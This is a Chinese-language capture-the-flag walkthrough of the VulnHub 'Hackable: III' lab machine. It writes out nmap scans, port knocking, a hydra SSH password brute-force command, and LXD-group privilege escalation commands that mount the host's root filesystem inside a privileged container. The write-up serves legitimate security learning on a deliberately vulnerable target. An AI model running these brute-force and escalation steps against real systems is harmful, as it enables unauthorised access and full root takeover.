VulnHub靶场----Hackable_3

免责声明

文章为作者学习记录,请勿利用文章相关技术从事非法活动,

 如因此产生任何的不良后果与文章作者无关,本文仅供学习参考。

 

靶机:Hackable: III ~ VulnHub

攻击机:VM kali-linux

  1.信息收集

nmap:收集端口服务信息

1、nmap -p- 192.168.56.110
2、nmap -sC -sV -p 22,80 192.168.56.110 -oN nmap.log

发现靶机开放了80端口,22端口filtered

VulnHub靶场----Hackable_3_第1张图片

2.WEB渗透

访问WEB

访问80端口,得到信息:

1、在元素中发现login_page/login.html网页

2、在元素注释得到用户名jubiscleudo

3、知道可能要port knocking

        端口敲门(端口碰撞)技术是一种通过在一组预先指定的关闭端口上产生连接请求,从外部打开防火墙上的端口的方法。一旦收到正确的连接请求序列,防火墙规则就会被动态修改,以允许发送连接请求的主机通过特定端口进行连接。也就是说,攻击者可能通过端口扫面来利用一些端口服务来发动攻击,但是一些固定的端口又需要开放来满足远程维护需求,因此,我们可以使用端口碰撞技术来形成一个访问控制。我们需要去碰撞一个特定的端口序列,才能够打开我们想要访问的端口。

4、关注.jpg文件

VulnHub靶场----Hackable_3_第2张图片

 目录扫描

发现如下目录

VulnHub靶场----Hackable_3_第3张图片

 

访问login_page页面,发现一个登录页面 ,随便输入一些弱口令,出现源码VulnHub靶场----Hackable_3_第4张图片

 

发现有个3.jpg图片,访问一下,下载图片,分析一波

VulnHub靶场----Hackable_3_第5张图片

 

图片信息没有什么有用信息,看下是否有隐写

VulnHub靶场----Hackable_3_第6张图片

 

发现有隐写,分离出来

VulnHub靶场----Hackable_3_第7张图片

 

发现一个端口号:65535

e8a5fec3b54742309d16a38bfc8d5662.png

 

 

访问备份目录,发现一个字典,下载下来 VulnHub靶场----Hackable_3_第8张图片

 

访问配置文件,在1.txt中发现base64加密密文

VulnHub靶场----Hackable_3_第9张图片

 

base64解码,得到一个端口号:10000

VulnHub靶场----Hackable_3_第10张图片

 

依此访问扫描出来的目录,在css/2.txt中发现混淆加密的密文,解码得到端口号:4444

VulnHub靶场----Hackable_3_第11张图片

 VulnHub靶场----Hackable_3_第12张图片

VulnHub靶场----Hackable_3_第13张图片 VulnHub靶场----Hackable_3_第14张图片

3.Port Knocking

端口敲门:knock ip port1 port2 port3... 一共6种顺序,最终确定端口顺序如下,敲门后22端口打开VulnHub靶场----Hackable_3_第15张图片

 

 根据前面得到的用户名和字典爆破SSH

hydra -l 用户名 -P 密码字典 ssh://ip

得到密码:onlymy,尝试登录

VulnHub靶场----Hackable_3_第16张图片

成功登录SSH,拿到第一个flag,在/home中还有一个用户家目录,但没有权限访问

VulnHub靶场----Hackable_3_第17张图片

4.提权 

d........最后找到一个备份配置文件,打开发现hackable_3和密码,用户与上面家目录名相同,尝试用该密码登录

VulnHub靶场----Hackable_3_第18张图片

 切换到hackable_3用户,发现在lxd组,利用lid提权

c5e114c8e0f648a0a95c748d62b09d7d.png

 

lxd提权:下载一个镜像,使用镜像创建容器,将容器目录直接映射到物理主机目录,即可在容器中直接访问物理主机的文件

这里在靶机上下不来下,在本地下载好传到靶机上去:

本地执行命令

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder 
./build-alpine
python2 -m SimpleHTTPServer 6789

靶机执行命令

lxc init 指纹 ignite -c security.privileged=true 
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

VulnHub靶场----Hackable_3_第19张图片

 

VulnHub靶场----Hackable_3_第20张图片

 

查看镜像,这里可以看到指纹FINGERPRINT

VulnHub靶场----Hackable_3_第21张图片

执行完之后,就提权成功,拿到第二个flag,Game Over!!

VulnHub靶场----Hackable_3_第22张图片

 

你可能感兴趣的:(网络,安全,web安全)